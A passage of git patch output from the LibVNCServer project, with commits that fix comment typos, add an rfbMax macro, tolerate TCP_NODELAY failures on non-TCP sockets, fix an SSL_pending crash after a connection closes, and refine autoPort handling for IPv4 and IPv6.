@@ Try example: it outputs on which port it listens (default: 5900), so it is display 0. To view, call vncviewer :0 You should see a sheet with a gradient and "Hello World!" written on it. Try -to paint something. Note that everytime you click, there is some bigger blot, +to paint something. Note that every time you click, there is some bigger blot, whereas when you drag the mouse while clicked you draw a line. The size of the blot depends on the mouse button you click. Open a second vncviewer with the same parameters and watch it as you paint in the other window. This also @@ -32,7 +32,7 @@ works over internet. You just have to know either the name or the IP of your machine. Then it is vncviewer machine.where.example.runs.com:0 or similar for the remote client. Now you are ready to type something. Be sure -that your mouse sits still, because everytime the mouse moves, the cursor is +that your mouse sits still, because every time the mouse moves, the cursor is reset to the position of the pointer! If you are done with that demo, press the down or up arrows. If your viewer supports it, then the dimensions of the sheet change. Just press Escape in the viewer. Note that the server still @@ -112,7 +112,7 @@ Before you draw something, be sure to call This tells LibVNCServer to hide the cursor. Remark: There are vncviewers out there, which know a cursor encoding, so that network traffic is low, and also the cursor doesn't need to be -drawn the cursor everytime an update is sent. LibVNCServer handles +drawn the cursor every time an update is sent. LibVNCServer handles all the details. Just set the cursor and don't bother any more. To set the mouse coordinates (or emulate mouse clicks), call @@ -323,7 +323,7 @@ If you love products from Redmod, you better skip this paragraph. I am always amazed how people react whenever Microsoft(tm) puts in some features into their products which were around for a long time. Especially reporters seem to not know dick about what they are reporting about! But -what is everytime annoying again, is that they don't do it right. Every +what is every time annoying again, is that they don't do it right. Every concept has it's new name (remember what enumerators used to be until Mickeysoft(tm) claimed that enumerators are what we thought were iterators. Yeah right, enumerators are also containers. They are not separated. Muddy.) diff --git a/client_examples/vnc2mpg.c b/client_examples/vnc2mpg.c index 10c3d3e..af4a73a 100644 --- a/client_examples/vnc2mpg.c +++ b/client_examples/vnc2mpg.c @@ -85,11 +85,11 @@ AVStream *add_video_stream(AVFormatContext *oc, int codec_id, int w, int h) } if (c->codec_id == CODEC_ID_MPEG1VIDEO){ /* needed to avoid using macroblocks in which some coeffs overflow - this doesnt happen with normal video, it just happens here as the - motion of the chroma plane doesnt match the luma plane */ + this doesn't happen with normal video, it just happens here as the + motion of the chroma plane doesn't match the luma plane */ c->mb_decision=2; } - /* some formats want stream headers to be seperate */ + /* some formats want stream headers to be separate */ if(!strcmp(oc->oformat->name, "mp4") || !strcmp(oc->oformat->name, "mov") || !strcmp(oc->oformat->name, "3gp")) c->flags |= CODEC_FLAG_GLOBAL_HEADER; diff --git a/common/zywrletemplate.c b/common/zywrletemplate.c index 904de40..faa7f07 100644 --- a/common/zywrletemplate.c +++ b/common/zywrletemplate.c @@ -9,7 +9,7 @@ * * * THE 'ZYWRLE' VNC CODEC SOURCE CODE IS (C) COPYRIGHT 2006 * * BY Hitachi Systems & Services, Ltd. * - * (Noriaki Yamazaki, Research & Developement Center) * * + * (Noriaki Yamazaki, Research & Development Center) * * * * ******************************************************************** Redistribution and use in source and binary forms, with or without diff --git a/examples/camera.c b/examples/camera.c index 58ab1c3..2e54da7 100644 --- a/examples/camera.c +++ b/examples/camera.c @@ -16,7 +16,7 @@ * Christian Daschill * * - * Answer: Originally, I thought about using seperate threads and using a + * Answer: Originally, I thought about using separate threads and using a * mutex to determine when the frame buffer was being accessed by any client * so we could determine a safe time to take a picture. The probem is, we * are lock-stepping everything with framebuffer access. Why not be a @@ -31,7 +31,7 @@ * as the libvncserver should not stall on transmitting to any single * client. * - * Another solution would be to provide a seperate framebuffer for each + * Another solution would be to provide a separate framebuffer for each * client and use mutexes to determine if any particular client is ready for * a snapshot. This way, your not updating a framebuffer for a slow client * while it is being transferred. diff --git a/libvncclient/listen.c b/libvncclient/listen.c index 6d4ad54..739cd9f 100644 --- a/libvncclient/listen.c +++ b/libvncclient/listen.c @@ -141,7 +141,7 @@ listenForIncomingConnections(rfbClient* client) /* * listenForIncomingConnectionsNoFork() - listen for incoming connections * from servers, but DON'T fork, instead just wait timeout microseconds. - * If timeout is negative, block indefinitly. + * If timeout is negative, block indefinitely. * Returns 1 on success (there was an incoming connection on the listen socket * and we accepted it successfully), -1 on error, 0 on timeout. */ diff --git a/libvncclient/sockets.c b/libvncclient/sockets.c index e32c60e..8ddfd9d 100644 --- a/libvncclient/sockets.c +++ b/libvncclient/sockets.c @@ -563,7 +563,7 @@ ListenAtTcpPortAndAddress(int port, const char *address) } #ifdef IPV6_V6ONLY - /* we have seperate IPv4 and IPv6 sockets since some OS's do not support dual binding */ + /* we have separate IPv4 and IPv6 sockets since some OS's do not support dual binding */ if (p->ai_family == AF_INET6 && setsockopt(sock, IPPROTO_IPV6, IPV6_V6ONLY, (char *)&one, sizeof(one)) < 0) { rfbClientErr("ListenAtTcpPortAndAddress: error in setsockopt IPV6_V6ONLY: %s\n", strerror(errno)); close(sock); diff --git a/libvncserver/cargs.c b/libvncserver/cargs.c index b9eb02b..4da04b5 100644 --- a/libvncserver/cargs.c +++ b/libvncserver/cargs.c @@ -1,5 +1,5 @@ /* - * This parses the command line arguments. It was seperated from main.c by + * This parses the command line arguments. It was separated from main.c by * Justin Dearing . */ diff --git a/libvncserver/scale.c b/libvncserver/scale.c index d11db40..3ca76dc 100644 --- a/libvncserver/scale.c +++ b/libvncserver/scale.c @@ -213,7 +213,7 @@ void rfbScaledScreenUpdateRect(rfbScreenInfoPtr screen, rfbScreenInfoPtr ptr, in case 2: pixel_value = *((unsigned short *)srcptr2); break; case 1: pixel_value = *((unsigned char *)srcptr2); break; default: - /* fixme: endianess problem? */ + /* fixme: endianness problem? */ for (z = 0; z < bytesPerPixel; z++) pixel_value += (srcptr2[z] << (8 * z)); break; @@ -240,7 +240,7 @@ void rfbScaledScreenUpdateRect(rfbScreenInfoPtr screen, rfbScreenInfoPtr ptr, in case 2: *((unsigned short *)dstptr) = (unsigned short) pixel_value; break; case 1: *((unsigned char *)dstptr) = (unsigned char) pixel_value; break; default: - /* fixme: endianess problem? */ + /* fixme: endianness problem? */ for (z = 0; z < bytesPerPixel; z++) dstptr[z]=(pixel_value >> (8 * z)) & 0xff; break; diff --git a/libvncserver/sockets.c b/libvncserver/sockets.c index 2bb655e..f21f162 100644 --- a/libvncserver/sockets.c +++ b/libvncserver/sockets.c @@ -925,7 +925,7 @@ rfbListenOnTCP6Port(int port, } #ifdef IPV6_V6ONLY - /* we have seperate IPv4 and IPv6 sockets since some OS's do not support dual binding */ + /* we have separate IPv4 and IPv6 sockets since some OS's do not support dual binding */ if (setsockopt(sock, IPPROTO_IPV6, IPV6_V6ONLY, (char *)&one, sizeof(one)) < 0) { rfbLogPerror("rfbListenOnTCP6Port error in setsockopt IPV6_V6ONLY"); closesocket(sock); diff --git a/libvncserver/tight.c b/libvncserver/tight.c index 89a7f25..bca374d 100644 --- a/libvncserver/tight.c +++ b/libvncserver/tight.c @@ -563,7 +563,7 @@ ExtendSolidArea(rfbClientPtr cl, /* * Check if a rectangle is all of the same color. If needSameColor is * set to non-zero, then also check that its color equals to the - * *colorPtr value. The result is 1 if the test is successfull, and in + * *colorPtr value. The result is 1 if the test is successful, and in * that case new color will be stored in *colorPtr. */ diff --git a/libvncserver/tightvnc-filetransfer/filetransfermsg.c b/libvncserver/tightvnc-filetransfer/filetransfermsg.c index 88fbe9a..153f123 100644 --- a/libvncserver/tightvnc-filetransfer/filetransfermsg.c +++ b/libvncserver/tightvnc-filetransfer/filetransfermsg.c @@ -108,8 +108,8 @@ GetFileListResponseMsg(char* path, char flags) /* fileListInfo can have null data if the folder is Empty - or if some error condition has occured. - The return value is 'failure' only if some error condition has occured. + or if some error condition has occurred. + The return value is 'failure' only if some error condition has occurred. */ status = CreateFileListInfo(&fileListInfo, path, !(flags & 0x10)); diff --git a/libvncserver/tightvnc-filetransfer/handlefiletransferrequest.c b/libvncserver/tightvnc-filetransfer/handlefiletransferrequest.c index 431912e..b235fa0 100644 --- a/libvncserver/tightvnc-filetransfer/handlefiletransferrequest.c +++ b/libvncserver/tightvnc-filetransfer/handlefiletransferrequest.c @@ -703,7 +703,7 @@ HandleFileUploadLengthError(rfbClientPtr cl, short fNameSize) return; } - rfbLog("File [%s]: Method [%s]: File Upload Length Error occured" + rfbLog("File [%s]: Method [%s]: File Upload Length Error occurred" "file path requested is <%s>\n", __FILE__, __FUNCTION__, path); if(path != NULL) { diff --git a/libvncserver/tightvnc-filetransfer/rfbtightproto.h b/libvncserver/tightvnc-filetransfer/rfbtightproto.h index ef683ae..d0fe642 100644 --- a/libvncserver/tightvnc-filetransfer/rfbtightproto.h +++ b/libvncserver/tightvnc-filetransfer/rfbtightproto.h @@ -208,7 +208,7 @@ void rfbHandleSecTypeTight(rfbClientPtr cl); * In the protocol version 3.7t, the server informs the client what message * types it supports in addition to ones defined in the protocol version 3.7. * Also, the server sends the list of all supported encodings (note that it's - * not necessary to advertise the "raw" encoding sinse it MUST be supported in + * not necessary to advertise the "raw" encoding since it MUST be supported in * RFB 3.x protocols). * * This data immediately follows the server initialisation message. diff --git a/libvncserver/tightvnc-filetransfer/rfbtightserver.c b/libvncserver/tightvnc-filetransfer/rfbtightserver.c index d43d3f3..67d4cb5 100644 --- a/libvncserver/tightvnc-filetransfer/rfbtightserver.c +++ b/libvncserver/tightvnc-filetransfer/rfbtightserver.c @@ -500,7 +500,7 @@ rfbHandleSecTypeTight(rfbClientPtr cl) { if(rtcp == NULL) { /* Error condition close socket */ - rfbLog("Memory error has occured while handling " + rfbLog("Memory error has occurred while handling " "Tight security type... closing connection.\n"); rfbCloseClient(cl); return; diff --git a/libvncserver/ultra.c b/libvncserver/ultra.c index 9485591..83bddaa 100644 --- a/libvncserver/ultra.c +++ b/libvncserver/ultra.c @@ -201,7 +201,7 @@ rfbSendRectEncodingUltra(rfbClientPtr cl, return FALSE; } - /* Technically, flushing the buffer here is not extrememly + /* Technically, flushing the buffer here is not extremely * efficient. However, this improves the overall throughput * of the system over very slow networks. By flushing * the buffer with every maximum size lzo rectangle, we diff --git a/libvncserver/zlib.c b/libvncserver/zlib.c index ac20c9c..45a1314 100644 --- a/libvncserver/zlib.c +++ b/libvncserver/zlib.c @@ -300,7 +300,7 @@ rfbSendRectEncodingZlib(rfbClientPtr cl, return FALSE; } - /* Technically, flushing the buffer here is not extrememly + /* Technically, flushing the buffer here is not extremely * efficient. However, this improves the overall throughput * of the system over very slow networks. By flushing * the buffer with every maximum size zlib rectangle, we diff --git a/rfb/keysym.h b/rfb/keysym.h index 219f95b..92d5158 100644 --- a/rfb/keysym.h +++ b/rfb/keysym.h @@ -162,7 +162,7 @@ SOFTWARE. #define XK_Zen_Koho 0xFF3D /* Multiple/All Candidate(s) */ #define XK_Mae_Koho 0xFF3E /* Previous Candidate */ -/* 0xFF31 thru 0xFF3F are under XK_KOREAN */ +/* 0xFF31 through 0xFF3F are under XK_KOREAN */ /* Cursor control & motion */ @@ -240,7 +240,7 @@ SOFTWARE. /* - * Auxilliary Functions; note the duplicate definitions for left and right + * Auxiliary Functions; note the duplicate definitions for left and right * function keys; Sun keyboards and a few other manufactures have such * function key groups on the left and/or right sides of the keyboard. * We've not found a keyboard with more than 35 function keys total. diff --git a/rfb/rfb.h b/rfb/rfb.h index 0c34d74..6da6323 100644 --- a/rfb/rfb.h +++ b/rfb/rfb.h @@ -477,7 +477,7 @@ typedef struct _rfbClientRec { authentication. If the right conditions are met this state will be set (see the auth.c file) when rfbProcessClientInitMessage is called. - If the state is RFB_INITIALISATION_SHARED we should not expect to recieve + If the state is RFB_INITIALISATION_SHARED we should not expect to receive any ClientInit message, but instead should proceed to the next stage of initialisation as though an implicit ClientInit message was received with a shared-flag of true. (There is currently no corresponding @@ -1253,14 +1253,14 @@ rfbBool rfbUpdateClient(rfbClientPtr cl); Try example.c: it outputs on which port it listens (default: 5900), so it is display 0. To view, call @code vncviewer :0 @endcode You should see a sheet with a gradient and "Hello World!" written on it. Try - to paint something. Note that everytime you click, there is some bigger blot, + to paint something. Note that every time you click, there is some bigger blot, whereas when you drag the mouse while clicked you draw a line. The size of the blot depends on the mouse button you click. Open a second vncviewer with the same parameters and watch it as you paint in the other window. This also works over internet. You just have to know either the name or the IP of your machine. Then it is @code vncviewer machine.where.example.runs.com:0 @endcode or similar for the remote client. Now you are ready to type something. Be sure - that your mouse sits still, because everytime the mouse moves, the cursor is + that your mouse sits still, because every time the mouse moves, the cursor is reset to the position of the pointer! If you are done with that demo, press the down or up arrows. If your viewer supports it, then the dimensions of the sheet change. Just press Escape in the viewer. Note that the server still diff --git a/rfb/rfbproto.h b/rfb/rfbproto.h index 354f1aa..d5e5291 100644 --- a/rfb/rfbproto.h +++ b/rfb/rfbproto.h @@ -1066,7 +1066,7 @@ typedef struct _rfbFileTransferMsg { #define rfbRErrorCmd 0xFFFFFFFF/* Error when a command fails on remote side (ret in "size" field) */ #define sz_rfbBlockSize 8192 /* Size of a File Transfer packet (before compression) */ -#define rfbZipDirectoryPrefix "!UVNCDIR-\0" /* Transfered directory are zipped in a file with this prefix. Must end with "-" */ +#define rfbZipDirectoryPrefix "!UVNCDIR-\0" /* Transferred directory are zipped in a file with this prefix. Must end with "-" */ #define sz_rfbZipDirectoryPrefix 9 #define rfbDirPrefix "[ " #define rfbDirSuffix " ]" diff --git a/webclients/java-applet/ssl/README b/webclients/java-applet/ssl/README index b244cf1..f5a2b66 100644 --- a/webclients/java-applet/ssl/README +++ b/webclients/java-applet/ssl/README @@ -42,9 +42,9 @@ Send full Java Console output for failures. Tips: When doing single-port proxy connections (e.g. both VNC and HTTPS -thru port 5900) it helps to move through the 'do you trust this site' +through port 5900) it helps to move through the 'do you trust this site' dialogs quickly. x11vnc has to wait to see if the traffic is VNC or -HTTP and this can cause timeouts if you don't move thru them quickly. +HTTP and this can cause timeouts if you don't move through them quickly. You may have to restart your browser completely if it gets into a weird state. For one case we saw the JVM requesting VncViewer.class @@ -172,7 +172,7 @@ Both TightVNC and UltraVNC Java viewers: Set to do a special HTTP GET (/request.https.vnc.connection) to the vnc server that will cause it to switch to VNC instead. This is to speedup/make more robust, the single port HTTPS and VNC - mode of x11vnc (e.g. both services thru port 5900, etc) + mode of x11vnc (e.g. both services through port 5900, etc) urlPrefix string, default: none diff --git a/webclients/java-applet/ssl/proxy.vnc b/webclients/java-applet/ssl/proxy.vnc index 6d3ab3d..0684200 100644 --- a/webclients/java-applet/ssl/proxy.vnc +++ b/webclients/java-applet/ssl/proxy.vnc @@ -25,7 +25,7 @@ fails in the proxy environment. The applet is not allowed to open a socket connection to the proxy (since that would let it connect to just about any host, e.g. CONNECT method). -This is indpendent of SSL but of course fails for that socket connection +This is independent of SSL but of course fails for that socket connection as well. I.e. this is a problem for non-SSL VNC Viewers as well. Solution? Sign the applet and have the user click on "Yes" that they diff --git a/webclients/java-applet/ssl/ss_vncviewer b/webclients/java-applet/ssl/ss_vncviewer index 7e793ff..b996600 100755 --- a/webclients/java-applet/ssl/ss_vncviewer +++ b/webclients/java-applet/ssl/ss_vncviewer @@ -91,7 +91,7 @@ # # [user1@]host1[:port1],[user2@]host2[:port2] # -# in which case a ssh to host1 and thru it via a -L redir a 2nd +# in which case a ssh to host1 and through it via a -L redir a 2nd # ssh is established to host2. # # Examples: @@ -109,10 +109,10 @@ # # -sshargs "args" pass "args" to the ssh process, e.g. -L/-R port redirs. # -# -sshssl Tunnel the SSL connection thru a SSH connection. The tunnel as -# under -ssh is set up and the SSL connection goes thru it. Use +# -sshssl Tunnel the SSL connection through a SSH connection. The tunnel as +# under -ssh is set up and the SSL connection goes through it. Use # this if you want to have and end-to-end SSL connection but must -# go thru a SSH gateway host (e.g. not the vnc server). Or use +# go through a SSH gateway host (e.g. not the vnc server). Or use # this if you need to tunnel additional services via -R and -L # (see -sshargs above). # @@ -351,7 +351,7 @@ if [ "X$SKIP_STUNNEL_NO_SYSLOG" = "X" ]; then STUNNEL_NO_SYSLOG=1; export STUNNEL_NO_SYSLOG fi -# this is the -t ssh option (gives better keyboard response thru SSH tunnel) +# this is the -t ssh option (gives better keyboard response through SSH tunnel) targ="-t" if [ "X$SS_VNCVIEWER_NO_T" != "X" ]; then targ="" diff --git a/webclients/java-applet/ssl/ultravnc-102-JavaViewer-ssl-etc.patch b/webclients/java-applet/ssl/ultravnc-102-JavaViewer-ssl-etc.patch index 3309860..3f3b9a0 100644 --- a/webclients/java-applet/ssl/ultravnc-102-JavaViewer-ssl-etc.patch +++ b/webclients/java-applet/ssl/ultravnc-102-JavaViewer-ssl-etc.patch @@ -978,7 +978,7 @@ diff -Naur JavaViewer.orig/FTPFrame.java JavaViewer/FTPFrame.java + } + String sFileName = ((String) selected); - // sf@2004 - Directory can't be transfered + // sf@2004 - Directory can't be transferred if (sFileName.substring(0, 2).equals(" [") && sFileName.substring((sFileName.length() - 1), sFileName.length()).equals("]")) { - JOptionPane.showMessageDialog(null, (String)"Directory Transfer is not yet available in this version...", "FileTransfer Info", JOptionPane.INFORMATION_MESSAGE); @@ -1036,7 +1036,7 @@ diff -Naur JavaViewer.orig/FTPFrame.java JavaViewer/FTPFrame.java + return null; + } + -+ // sf@2004 - Directory can't be transfered ++ // sf@2004 - Directory can't be transferred + if (sFileName.substring(0, 2).equals(" [") && sFileName.substring((sFileName.length() - 1), sFileName.length()).equals("]")) + { + return null; @@ -1084,7 +1084,7 @@ diff -Naur JavaViewer.orig/FTPFrame.java JavaViewer/FTPFrame.java + } + String sFileName = ((String) selected); - // sf@2004 - Directory can't be transfered + // sf@2004 - Directory can't be transferred if (sFileName.substring(0, 2).equals(" [") && sFileName.substring((sFileName.length() - 1), sFileName.length()).equals("]")) { - JOptionPane.showMessageDialog(null, (String)"Directory Transfer is not yet available in this version...", "FileTransfer Info", JOptionPane.INFORMATION_MESSAGE); diff --git a/webclients/novnc/include/display.js b/webclients/novnc/include/display.js index 8763fa4..2f1211a 100644 --- a/webclients/novnc/include/display.js +++ b/webclients/novnc/include/display.js @@ -76,7 +76,7 @@ var Display; } if (this._prefer_js === null) { - Util.Info("Prefering javascript operations"); + Util.Info("Preferring javascript operations"); this._prefer_js = true; } diff --git a/webclients/novnc/include/rfb.js b/webclients/novnc/include/rfb.js index 0afe656..cba015d 100644 --- a/webclients/novnc/include/rfb.js +++ b/webclients/novnc/include/rfb.js @@ -46,7 +46,7 @@ var RFB; ['DesktopSize', -223 ], ['Cursor', -239 ], - // Psuedo-encoding settings + // Pseudo-encoding settings //['JPEG_quality_lo', -32 ], ['JPEG_quality_med', -26 ], //['JPEG_quality_hi', -23 ], diff --git a/webclients/novnc/include/ui.js b/webclients/novnc/include/ui.js index e869aa6..2eaf29d 100644 --- a/webclients/novnc/include/ui.js +++ b/webclients/novnc/include/ui.js @@ -883,7 +883,7 @@ var UI; $D('showKeyboard').className = "noVNC_status_button"; //Weird bug in iOS if you change keyboardVisible //here it does not actually occur so next time - //you click keyboard icon it doesnt work. + //you click keyboard icon it doesn't work. UI.hideKeyboardTimeout = setTimeout(function() { UI.setKeyboard(); },100); }, -- cgit v1.2.3 From dfa5e275792504c324e5c5080f5b688c1c26b568 Mon Sep 17 00:00:00 2001 From: Wen Shuguang Date: Fri, 15 Apr 2016 15:11:52 +0800 Subject: Enable AF_UNIX socket: ignore setsockopt TCP_NODELAY failure. --- libvncserver/rfbserver.c | 4 +--- libvncserver/sockets.c | 11 +++-------- 2 files changed, 4 insertions(+), 11 deletions(-) (limited to 'libvncserver') diff --git a/libvncserver/rfbserver.c b/libvncserver/rfbserver.c index 34e1c06..e2ab221 100644 --- a/libvncserver/rfbserver.c +++ b/libvncserver/rfbserver.c @@ -363,9 +363,7 @@ rfbNewTCPOrUDPClient(rfbScreenInfoPtr rfbScreen, if (setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&one, sizeof(one)) < 0) { - rfbLogPerror("setsockopt failed"); - close(sock); - return NULL; + rfbLogPerror("setsockopt failed: can't set TCP_NODELAY flag, non TCP socket?"); } FD_SET(sock,&(rfbScreen->allFds)); diff --git a/libvncserver/sockets.c b/libvncserver/sockets.c index f21f162..d8a66a1 100644 --- a/libvncserver/sockets.c +++ b/libvncserver/sockets.c @@ -146,8 +146,7 @@ rfbInitSockets(rfbScreenInfoPtr rfbScreen) if (setsockopt(rfbScreen->inetdSock, IPPROTO_TCP, TCP_NODELAY, (char *)&one, sizeof(one)) < 0) { - rfbLogPerror("setsockopt"); - return; + rfbLogPerror("setsockopt failed: can't set TCP_NODELAY flag, non TCP socket?"); } FD_ZERO(&(rfbScreen->allFds)); @@ -453,9 +452,7 @@ rfbProcessNewConnection(rfbScreenInfoPtr rfbScreen) if (setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&one, sizeof(one)) < 0) { - rfbLogPerror("rfbCheckFds: setsockopt"); - closesocket(sock); - return FALSE; + rfbLogPerror("rfbCheckFds: setsockopt failed: can't set TCP_NODELAY flag, non TCP socket?"); } #ifdef USE_LIBWRAP @@ -556,9 +553,7 @@ rfbConnect(rfbScreenInfoPtr rfbScreen, if (setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&one, sizeof(one)) < 0) { - rfbLogPerror("setsockopt failed"); - closesocket(sock); - return -1; + rfbLogPerror("setsockopt failed: can't set TCP_NODELAY flag, non TCP socket?"); } /* AddEnabledDevice(sock); */ -- cgit v1.2.3 From 53cc1fa18a3b96d2c31a145d971017564fca39bb Mon Sep 17 00:00:00 2001 From: Rex Dieter Date: Thu, 18 Feb 2016 08:29:07 -0600 Subject: use namespaced rfbMax macro (issue #102) Not using generic 'max', avoids conflicts with stl_algobase.h --- libvncclient/listen.c | 9 +++------ libvncserver/httpd.c | 2 +- libvncserver/rfbserver.c | 2 +- libvncserver/sockets.c | 8 ++++---- rfb/rfbproto.h | 2 +- 5 files changed, 10 insertions(+), 13 deletions(-) (limited to 'libvncserver') diff --git a/libvncclient/listen.c b/libvncclient/listen.c index 739cd9f..e989d6a 100644 --- a/libvncclient/listen.c +++ b/libvncclient/listen.c @@ -30,9 +30,6 @@ #ifdef WIN32 #define close closesocket #include -#ifdef _MINGW32 -#undef max -#endif // #ifdef _MINGW32 #else // #ifdef WIN32 #include #include @@ -99,7 +96,7 @@ listenForIncomingConnections(rfbClient* client) if(listen6Socket >= 0) FD_SET(listen6Socket, &fds); - r = select(max(listenSocket, listen6Socket)+1, &fds, NULL, NULL, NULL); + r = select(rfbMax(listenSocket, listen6Socket)+1, &fds, NULL, NULL, NULL); if (r > 0) { if (FD_ISSET(listenSocket, &fds)) @@ -195,9 +192,9 @@ listenForIncomingConnectionsNoFork(rfbClient* client, int timeout) FD_SET(client->listen6Sock, &fds); if (timeout < 0) - r = select(max(client->listenSock, client->listen6Sock) +1, &fds, NULL, NULL, NULL); + r = select(rfbMax(client->listenSock, client->listen6Sock) +1, &fds, NULL, NULL, NULL); else - r = select(max(client->listenSock, client->listen6Sock) +1, &fds, NULL, NULL, &to); + r = select(rfbMax(client->listenSock, client->listen6Sock) +1, &fds, NULL, NULL, &to); if (r > 0) { diff --git a/libvncserver/httpd.c b/libvncserver/httpd.c index 2a778e7..236ab3e 100644 --- a/libvncserver/httpd.c +++ b/libvncserver/httpd.c @@ -192,7 +192,7 @@ rfbHttpCheckFds(rfbScreenInfoPtr rfbScreen) } tv.tv_sec = 0; tv.tv_usec = 0; - nfds = select(max(rfbScreen->httpListen6Sock, max(rfbScreen->httpSock,rfbScreen->httpListenSock)) + 1, &fds, NULL, NULL, &tv); + nfds = select(rfbMax(rfbScreen->httpListen6Sock, rfbMax(rfbScreen->httpSock,rfbScreen->httpListenSock)) + 1, &fds, NULL, NULL, &tv); if (nfds == 0) { return; } diff --git a/libvncserver/rfbserver.c b/libvncserver/rfbserver.c index 34e1c06..68c2de5 100644 --- a/libvncserver/rfbserver.c +++ b/libvncserver/rfbserver.c @@ -369,7 +369,7 @@ rfbNewTCPOrUDPClient(rfbScreenInfoPtr rfbScreen, } FD_SET(sock,&(rfbScreen->allFds)); - rfbScreen->maxFd = max(sock,rfbScreen->maxFd); + rfbScreen->maxFd = rfbMax(sock,rfbScreen->maxFd); INIT_MUTEX(cl->outputMutex); INIT_MUTEX(cl->refCountMutex); diff --git a/libvncserver/sockets.c b/libvncserver/sockets.c index f21f162..aaef14b 100644 --- a/libvncserver/sockets.c +++ b/libvncserver/sockets.c @@ -193,7 +193,7 @@ rfbInitSockets(rfbScreenInfoPtr rfbScreen) rfbLog("Autoprobing selected TCP6 port %d\n", rfbScreen->ipv6port); FD_SET(rfbScreen->listen6Sock, &(rfbScreen->allFds)); - rfbScreen->maxFd = max((int)rfbScreen->listen6Sock,rfbScreen->maxFd); + rfbScreen->maxFd = rfbMax((int)rfbScreen->listen6Sock,rfbScreen->maxFd); #endif } else @@ -220,7 +220,7 @@ rfbInitSockets(rfbScreenInfoPtr rfbScreen) rfbLog("Listening for VNC connections on TCP6 port %d\n", rfbScreen->ipv6port); FD_SET(rfbScreen->listen6Sock, &(rfbScreen->allFds)); - rfbScreen->maxFd = max((int)rfbScreen->listen6Sock,rfbScreen->maxFd); + rfbScreen->maxFd = rfbMax((int)rfbScreen->listen6Sock,rfbScreen->maxFd); } #endif @@ -236,7 +236,7 @@ rfbInitSockets(rfbScreenInfoPtr rfbScreen) rfbLog("Listening for VNC connections on TCP port %d\n", rfbScreen->port); FD_SET(rfbScreen->udpSock, &(rfbScreen->allFds)); - rfbScreen->maxFd = max((int)rfbScreen->udpSock,rfbScreen->maxFd); + rfbScreen->maxFd = rfbMax((int)rfbScreen->udpSock,rfbScreen->maxFd); } } @@ -563,7 +563,7 @@ rfbConnect(rfbScreenInfoPtr rfbScreen, /* AddEnabledDevice(sock); */ FD_SET(sock, &rfbScreen->allFds); - rfbScreen->maxFd = max(sock,rfbScreen->maxFd); + rfbScreen->maxFd = rfbMax(sock,rfbScreen->maxFd); return sock; } diff --git a/rfb/rfbproto.h b/rfb/rfbproto.h index 8e607e5..bb6bfa5 100644 --- a/rfb/rfbproto.h +++ b/rfb/rfbproto.h @@ -93,8 +93,8 @@ #define strncasecmp _strnicmp #endif +#define rfbMax(a,b) (((a)>(b))?(a):(b)) #if !defined(WIN32) || defined(__MINGW32__) -#define max(a,b) (((a)>(b))?(a):(b)) #ifdef LIBVNCSERVER_HAVE_SYS_TIME_H #include #endif -- cgit v1.2.3 From 1417cb1c3f19de906074983bd98caee5283cb006 Mon Sep 17 00:00:00 2001 From: George Fleury Date: Fri, 13 May 2016 06:01:43 -0300 Subject: Avoid calling SSL_pending when connection is already closed Avoid calling SSL_pending when connection is already closed, calling SSL_pending with connection already closed is crashing. To reproduce, open a secure websocket binay protocol connection with libvncserver compiled with OpenSSL, and when libvncserver is waiting for rfbProcessClientProtocolVersion send any invalid char, it will fail and call rfbCloseClient whith destroy all SSL context, calling SSL_pending after that will generate a invalid access. --- libvncserver/sockets.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) (limited to 'libvncserver') diff --git a/libvncserver/sockets.c b/libvncserver/sockets.c index e960936..51e86eb 100644 --- a/libvncserver/sockets.c +++ b/libvncserver/sockets.c @@ -394,7 +394,7 @@ rfbCheckFds(rfbScreenInfoPtr rfbScreen,long usec) #ifdef LIBVNCSERVER_WITH_WEBSOCKETS do { rfbProcessClientMessage(cl); - } while (webSocketsHasDataInBuffer(cl)); + } while (cl->sock > 0 && webSocketsHasDataInBuffer(cl)); #else rfbProcessClientMessage(cl); #endif -- cgit v1.2.3 From cdd81bd479e228724ef03bf94c42a34feb42145a Mon Sep 17 00:00:00 2001 From: Zac Medico Date: Sun, 14 Aug 2016 18:19:02 -0700 Subject: Support autoPort with ipv4 or ipv6 disabled Make it possible to get autoPort behavior with either ipv4 or ipv6 disabled, by setting rfbScreen->ipv6port or rfbScreen->port to a negative number. This will make it possible for x11vnc to enforce its -noipv6 option, as discussed in the following bug report: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=672449 --- libvncserver/sockets.c | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) (limited to 'libvncserver') diff --git a/libvncserver/sockets.c b/libvncserver/sockets.c index 51e86eb..6467b1c 100644 --- a/libvncserver/sockets.c +++ b/libvncserver/sockets.c @@ -155,10 +155,10 @@ rfbInitSockets(rfbScreenInfoPtr rfbScreen) return; } - if(rfbScreen->autoPort) { - int i; - FD_ZERO(&(rfbScreen->allFds)); + FD_ZERO(&(rfbScreen->allFds)); + if(rfbScreen->autoPort && rfbScreen->port>0) { + int i; rfbLog("Autoprobing TCP port \n"); for (i = 5900; i < 6000; i++) { if ((rfbScreen->listenSock = rfbListenOnTCPPort(i, iface)) >= 0) { @@ -175,8 +175,11 @@ rfbInitSockets(rfbScreenInfoPtr rfbScreen) rfbLog("Autoprobing selected TCP port %d\n", rfbScreen->port); FD_SET(rfbScreen->listenSock, &(rfbScreen->allFds)); rfbScreen->maxFd = rfbScreen->listenSock; + } #ifdef LIBVNCSERVER_IPv6 + if(rfbScreen->autoPort && rfbScreen->ipv6port>0) { + int i; rfbLog("Autoprobing TCP6 port \n"); for (i = 5900; i < 6000; i++) { if ((rfbScreen->listen6Sock = rfbListenOnTCP6Port(i, rfbScreen->listen6Interface)) >= 0) { @@ -193,12 +196,11 @@ rfbInitSockets(rfbScreenInfoPtr rfbScreen) rfbLog("Autoprobing selected TCP6 port %d\n", rfbScreen->ipv6port); FD_SET(rfbScreen->listen6Sock, &(rfbScreen->allFds)); rfbScreen->maxFd = rfbMax((int)rfbScreen->listen6Sock,rfbScreen->maxFd); -#endif } - else - { +#endif + + if(!rfbScreen->autoPort) { if(rfbScreen->port>0) { - FD_ZERO(&(rfbScreen->allFds)); if ((rfbScreen->listenSock = rfbListenOnTCPPort(rfbScreen->port, iface)) < 0) { rfbLogPerror("ListenOnTCPPort"); -- cgit v1.2.3 From 21fd4d27bb248d506b37c3c43969f3db2f67c820 Mon Sep 17 00:00:00 2001 From: Kyle 